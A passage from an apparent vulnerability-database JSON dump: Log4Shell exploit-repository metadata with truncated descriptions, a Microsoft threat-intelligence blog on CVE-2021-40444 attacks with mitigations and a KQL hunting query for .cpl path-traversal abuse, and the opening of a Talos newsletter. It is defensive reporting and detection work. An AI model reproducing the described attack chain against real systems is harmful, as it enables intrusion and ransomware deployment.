{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-25T21:35:32", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-25T21:37:58", "id": "423CC97A-8BDD-56B9-9449-FC05A902AEC1", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:33", "description": "# Test exploit of CVE-2021-44228 (log4shell)\n\n### Preparation\n\n`...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T01:50:22", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T13:48:51", "id": "4F11FB83-F6EC-5ED2-B08D-9D86D6104DC7", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:13:59", "description": "# Disclaimer\nThis project is for personal practice purposes only...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-03-20T12:13:13", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2023-03-20T12:13:13", "id": "3E66E49D-6A9B-530D-AF77-12B96257655A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:27", "description": "<h1 align=\"center\">PY-Log4ShellScanner</h1>\n<h4 align=\"center\">A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T10:06:07", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T10:40:07", "id": "21B5671D-2A35-52FF-9702-380A32B96260", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-02-08T18:22:43", "description": "# log4j-detect\n\n<h4 align=\"center\">Simple Python 3 script to det...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T08:48:59", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T12:17:01", "id": "FB593988-2CFC-5828-8229-9274AC7B0F86", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:34:59", "description": "# TekiumLog4jApp v1.0\n\nAuthor: Erick Rodr\u00edguez \n\nEmail: erickrr....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T17:59:56", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T20:16:38", "id": "254068B4-97B4-5DCF-A60F-5206B6DD230E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-05-23T17:35:44", "description": "# scanlist-log4j\nSimple bash script to scan multiples url for lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T12:20:00", "type": "githubexploit", "title": "Exploit for Improper Input Validation in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T15:36:11", "id": "03C230DA-F801-5660-BF8E-AB8F44E2755C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "mmpc": [{"lastseen": "2021-09-30T19:14:09", "description": "In August, Microsoft Threat Intelligence Center (MSTIC) identified a small number of attacks (less than 10) that attempted to exploit a remote code execution vulnerability in MSHTML using specially crafted Microsoft Office documents. These attacks used the vulnerability, tracked as [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders. These loaders communicated with an infrastructure that Microsoft associates with multiple cybercriminal campaigns, including human-operated ransomware.\n\nThe observed attack vector relies on a malicious ActiveX control that could be loaded by the browser rendering engine using a malicious Office document. Customers who enabled [attack surface reduction rules](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/attack-surface-reduction-rules?view=o365-worldwide>) to block Office from creating child processes are not impacted by the exploitation technique used in these attacks. While these attacks used a vulnerability to access entry point devices and run highly-privileged code, the secondary actions taken by the attackers still rely on stealing credentials and moving laterally to cause organization-wide impact. This illustrates the importance of investing in attack surface reduction, credential hygiene, and lateral movement mitigations. Customers are advised to apply the [security patch](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) for CVE-2021-40444 to fully mitigate this vulnerability.\n\nThis blog details our in-depth analysis of the attacks that used the CVE-2021-40444, provides detection details and investigation guidance for [Microsoft 365 Defender](<https://www.microsoft.com/en-us/microsoft-365/security/microsoft-365-defender>) customers, and lists mitigation steps for hardening networks against this and similar attacks. Our colleagues at [RiskIQ conducted their own analysis](<https://www.riskiq.com/blog/external-threat-management/wizard-spider-windows-0day-exploit/>) and coordinated with Microsoft in publishing this research.\n\n## Exploit delivery mechanism\n\nThe initial campaigns in August 2021 likely originated from emails impersonating contracts and legal agreements, where the documents themselves were hosted on file-sharing sites. The exploit document used an external oleObject relationship to embed exploitative JavaScript within MIME HTML remotely hosted content that results in (1) the download of a CAB file containing a DLL bearing an INF file extension, (2) decompression of that CAB file, and (3) execution of a function within that DLL. The DLL retrieves remotely hosted shellcode (in this instance, a custom Cobalt Strike Beacon loader) and loads it into _wabmig.exe_ (Microsoft address import tool.)\n\n\n\n_Figure 1. The original exploit vector: an externally targeted oleObject relationship definition bearing an MHTML handler prefix pointed at an HTML file hosted on infrastructure that has similar qualities to the Cobalt Strike Beacon infrastructure that the loader\u2019s payload communicates with._\n\nContent that is downloaded from an external source is tagged by the Windows operating system with a mark of the web, indicating it was downloaded from a potentially untrusted source. This invokes Protected Mode in Microsoft Office, requiring user interaction to disable it to run content such as macros. However, in this instance, when opened without a mark of the web present, the document\u2019s payload executed immediately without user interaction \u2013 indicating the abuse of a vulnerability.\n\n\n\n_Figure 2. Attack chain of DEV-0413 campaign that used CVE-2021-40444_\n\n## DEV-0413 observed exploiting CVE-2021-40444\n\nAs part of Microsoft\u2019s ongoing commitment to tracking both nation state and cybercriminal threat actors, we refer to the unidentified threat actor as a \u201cdevelopment group\u201d and utilize a threat actor naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during the tracking and investigation phases before MSTIC reaches high confidence about the origin or identity of the actor behind an operation. MSTIC tracks a large cluster of cybercriminal activity involving Cobalt Strike infrastructure under the name DEV-0365.\n\nThe infrastructure we associate with DEV-0365 has several overlaps in behavior and unique identifying characteristics of Cobalt Strike infrastructure that suggest it was created or managed by a distinct set of operators. However, the follow-on activity from this infrastructure indicates multiple threat actors or clusters associated with human-operated ransomware attacks (including the deployment of Conti ransomware). One explanation is that DEV-0365 is involved in a form of command- and-control infrastructure as a service for cybercriminals.\n\nAdditionally, some of the infrastructure that hosted the oleObjects utilized in the August 2021 attacks abusing CVE-2021-40444 were also involved in the delivery of BazaLoader and Trickbot payloads -- activity that overlaps with a group Microsoft tracks as DEV-0193. DEV-0193 activities overlap with actions tracked by Mandiant as UNC1878.\n\nDue to the uncertainty surrounding the nature of the shared qualities of DEV-0365 infrastructure and the significant variation in malicious activity, MSTIC clustered the initial email campaign exploitation identified as CVE-2021-40444 activity separately, under DEV-0413.\n\nThe DEV-0413 campaign that used CVE-2021-40444 has been smaller and more targeted than other malware campaigns we have identified leveraging DEV-0365 infrastructure. We observed the earliest exploitation attempt of this campaign on August 18. The social engineering lure used in the campaign, initially highlighted by Mandiant, aligned with the business operations of targeted organizations, suggesting a degree of purposeful targeting. The campaign purported to seek a developer for a mobile application, with multiple application development organizations being targeted. In most instances, file-sharing services were abused to deliver the CVE-2021-40444-laden lure.\n\nIt is worth highlighting that while monitoring the DEV-0413 campaign, Microsoft identified active DEV-0413 infrastructure hosting CVE-2021-40444 content wherein basic security principles had not been applied. DEV-0413 did not limit the browser agents able to access the server to their malware implant or known targets, thereby permitting directory listing for their web server. In doing so, the attackers exposed their exploit to anyone who might have gained interest based on public social media discussion.\n\n\n\n_Figure 3. Content of the original DEV-0413 email lure seeking application developers_\n\nAt least one organization that was successfully compromised by DEV-0413 in their August campaign was previously compromised by a wave of similarly-themed malware that interacted with DEV-0365 infrastructure almost two months before the CVE-2021-40444 attack. It is currently not known whether the retargeting of this organization was intentional, but it reinforces the connection between DEV-0413 and DEV-0365 beyond sharing of infrastructure.\n\nIn a later wave of DEV-0413 activity on September 1, Microsoft identified a lure change from targeting application developers to a \u201csmall claims court\u201d legal threat.\n\n\n\n_Figure 4. Example of the \u201cSmall claims court\u201d lure utilized by DEV-0413__ _\n\n## Vulnerability usage timeline\n\nOn August 21, 2021, MSTIC observed a social media post by a Mandiant employee with experience tracking Cobalt Strike Beacon infrastructure. This post highlighted a Microsoft Word document (SHA-256: [3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf](<https://www.virustotal.com/gui/file/3bddb2e1a85a9e06b9f9021ad301fdcde33e197225ae1676b8c6d0b416193ecf>)) that had been uploaded to VirusTotal on August 19, 2021. The post\u2019s focus on this document was highlighting the custom Cobalt Strike Beacon loader and did not focus on the delivery mechanism.\n\nMSTIC analyzed the sample and determined that an anomalous oleObject relationship in the document was targeted at an external malicious HTML resource with an MHTML handler and likely leading to abuse of an undisclosed vulnerability. MSTIC immediately engaged the Microsoft Security Response Center and work began on a mitigation and patch. During this process, MSTIC collaborated with the original finder at Mandiant to reduce the discussion of the issue publicly and avoid drawing threat actor attention to the issues until a patch was available. Mandiant partnered with MSTIC and did their own reverse engineering assessment and submitted their findings to MSRC.\n\nOn September 7, 2021, Microsoft released a security advisory for CVE-2021-40444 containing a partial workaround. As a routine in these instances, Microsoft was working to ensure that the detections described in the advisory would be in place and a patch would be available before public disclosure. During the same time, a third-party researcher reported a sample to Microsoft from the same campaign originally shared by Mandiant. This sample was publicly disclosed on September 8. We observed a rise in exploitation attempts within 24 hours.\n\n\n\n_Figure 5. Graphic showing original exploitation on August 18 and attempted exploitation increasing after public disclosure _\n\nMicrosoft continues to monitor the situation and work to deconflict testing from actual exploitation. Since the public disclosure, Microsoft has observed multiple threat actors, including ransomware-as-a-service affiliates, adopting publicly disclosed proof-of-concept code into their toolkits. We will continue to provide updates as we learn more.\n\n## Mitigating the attacks\n\nMicrosoft has confirmed that the following [attack surface reduction rule](<https://docs.microsoft.com/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>) blocks activity associated with exploitation of CVE-2021-40444 at the time of publishing:\n\n * \u200bBlock all Office applications from creating child processes\n\nApply the following mitigations to reduce the impact of this threat and follow-on actions taken by attackers.\n\n * Apply the security updates for [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>). Comprehensive updates addressing the vulnerabilities used in this campaign are available through the [September 2021 security updates](<https://msrc.microsoft.com/update-guide/>).\n * Run the latest version of your operating systems and applications. Turn on automatic updates or deploy the latest security updates as soon as they become available.\n * Use a supported platform, such as Windows 10, to take advantage of regular security updates.\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>)in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>)in Microsoft Defender for Endpoint, to prevent malicious changes to security settings.\n * Run [EDR in block mode](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>)so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.\n * Enable [investigation and remediation](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>)in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.\n * Use [device discovery](<https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>)to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint.\n\n## Microsoft 365 Defender detection details\n\n**Antivirus**\n\nMicrosoft Defender Antivirus detects threat components as the following malware:\n\n * [TrojanDownloader:O97M/Donoff.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA&threatId=-2147225317>) \u2013 Detects the Word Doc files in the observed attacks\n * [TrojanDownloader:HTML/Donoff.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:HTML/Donoff.SA&threatId=-2147174205>) \u2013 Detects the remotely-loaded HTML\n * [Trojan:Win32/Agent.SA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Agent.SA&threatId=-2147178093>) -- Detects the .inf(Dll)/CAB components in the observed attacks\n * [Trojan:Win32/CplLoader.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/CplLoader.A&threatId=-2147178092>) \u2013 Blocks Rundll32/Control abuse used in this CVE exploitation\n * [Behavior:Win32/OfficeMhtInj.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/OfficeMhtInj.A&threatId=-2147178094>) \u2013 Detects the injection into wabmig.exe\n * [TrojanDownloader:O97M/Donoff.SA!CAB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA!CAB&threatId=-2147173661>) \u2013 Detects CAB files in observed attacks\n * [TrojanDownloader:O97M/Donoff.SA!Gen](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:O97M/Donoff.SA!Gen&threatId=-2147173660>) \u2013 Detects Office documents in observed attacks\n\n**Endpoint detection and response (EDR)**\n\nAlerts with the following titles in the security center can indicate threat activity on your network:\n\n * Possible exploitation of CVE-2021-40444 (requires Defender Antivirus as the Active AV)\n\nThe following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.\n\n * Suspicious Behavior By Office Application (detects the anomalous process launches that happen in exploitation of this CVE, and other malicious behavior)\n * Suspicious use of Control Panel item\n\n**Microsoft Defender for Office365**\n\nMicrosoft Defender for Office 365 detects exploit documents delivered via email when detonation is enabled using the following detection names:\n\n * Trojan_DOCX_OLEAnomaly_A \n * Description = &quot;The sample is an Office document which contains a suspicious oleobject definition.&quot;\n * Trojan_DOCX_OLEAnomaly_AB \n * Description = &quot;The sample is an Office document which exhibits malicious template injection qualities.&quot;\n * Exploit_Office_OleObject_A \n * Description = &quot;This sample is an Office document which exhibits malicious qualities.&quot;\n * Exploit_Office_OleObject_B \n * Description = &quot;This sample is an Office document which exhibits malicious qualities.&quot;\n\nThe following alerts in your portal indicate that a malicious attachment has been blocked, although these alerts are also used for many different threats:\n\n * Malware campaign detected and blocked\n * Malware campaign detected after delivery\n * Email messages containing malicious file removed after delivery\n\n## Advanced hunting\n\nTo locate possible exploitation activity, run the following queries.\n\n**Relative path traversal (requires Microsoft 365 Defender)**\n\nUse the following query to surface abuse of Control Panel objects (.cpl) via URL protocol handler path traversal as used in the original attack and public proof of concepts at time of publishing:\n\n`DeviceProcessEvents \n| where (FileName in~('control.exe','rundll32.exe') and ProcessCommandLine has '.cpl:') \nor ProcessCommandLine matches regex @'\\\"\\.[a-zA-Z]{2,4}:\\.\\.\\/\\.\\.'`\n\n**Azure Sentinel **\n\nTo locate possible attacks that exploit the CVE-2021-40444 , Azure Sentinel customers can leverage the following detection query: [Azure Sentinel MSHTML exploit detection](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/MSHTMLVuln.yaml>).\n\n \n\nThe post [Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {}, "published": "2021-09-15T23:40:56", "type": "mmpc", "title": "Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-15T23:40:56", "id": "MMPC:795E0A765679492C51FEFA2B19EAD597", "href": "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2023-03-24T20:18:32", "description": "\n\nWelcome to this week&#x27;s edition of the Threat Source newsletter.\n\nThere is no shortage of [hyperbolic headlines](<https://www.businessinsider.com/chatgpt-jobs-at-risk-replacement-artificial-intelligence-ai-labor-trends-2023-02?ref=blog.talosintelligence.com>) about ChatGPT out there, everything from how it and other AI tools like it are here to replace all our jobs, make college essays a thing of the past and change the face of cybersecurity as we know it.\n\nIt&#x27;s the talk of SEO managers everywhere who can&#x27;t wait to find a way to work &quot;ChatGPT&quot; into a headline. And in the security community, everyone is concerned that AI models will help attackers get smarter, faster or more dangerous.\n\nThe biggest issue I&#x27;m seeing with that is these tools aren&#x27;t that smart.\n\nOther writers have done a [far more eloquent](<https://www.theatlantic.com/technology/archive/2022/12/chatgpt-openai-artificial-intelligence-writing-ethics/672386/?ref=blog.talosintelligence.com>) and interesting job than I can in a few dozen words here about [how bad these models are at writing creatively or interpreting human emotion](<https://www.vice.com/en/article/bvmk9m/everybody-please-calm-down-about-chatgpt?ref=blog.talosintelligence.com>), but I wanted to put my own spin on things with my incredibly niche interests and use case for ChatGPT.\n\nFirst, I asked it to help me write this newsletter. While it politely declined to do the whole thing for me because it can&#x27;t produce something on Talos&#x27; behalf, it did start to compile a list of &quot;the top stories we&#x27;re following this week.&quot;\n\n![Threat Source newsletter \\(March 9, 2023\\) \u2014 Stop freaking out about ChatGPT](data:image/png;base64,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